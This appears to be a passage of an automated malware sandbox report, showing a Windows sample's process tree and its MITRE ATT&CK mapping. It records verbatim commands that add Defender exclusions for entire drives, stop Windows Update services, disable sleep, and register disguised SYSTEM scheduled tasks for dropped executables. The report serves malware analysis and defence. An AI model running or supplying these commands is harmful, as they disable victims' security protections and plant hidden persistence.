        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3040
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4988" "2128" "2084" "2132" "0" "0" "2136" "0" "0" "0" "0" "0"
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3284
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2192
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3284" "2196" "2112" "2200" "0" "0" "2204" "0" "0" "0" "0" "0"
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1124
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Cookies\unsecapp.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\serviced\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:532
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4476" "2172" "2096" "2176" "0" "0" "2180" "0" "0" "0" "0" "0"
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\Registry.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\services.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1344
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1jNuw3RpYi.bat"
        7⤵
        
        PID:3896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1132
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:6032
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:624
        
        C:\Recovery\WindowsRE\services.exe
        
        "C:\Recovery\WindowsRE\services.exe"
        8⤵
        
        PID:5828
- - C:\Users\Admin\AppData\Local\Temp\twain32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4036
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3452
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3408
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4388
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:212
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4760
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1704
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4284
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3380
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:384
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4756
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4840
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3784
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1624
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3708
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3436
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1452
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1516
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1996
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3252
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2864
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4424
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4960
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1088
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:3032
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2880
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1112
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:244
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2140
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3536

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3720

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3876

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2676

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3680

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3888

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5012

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Java\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Java\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 13 /tr "'C:\fontwin\MsServerHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 11 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5820

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery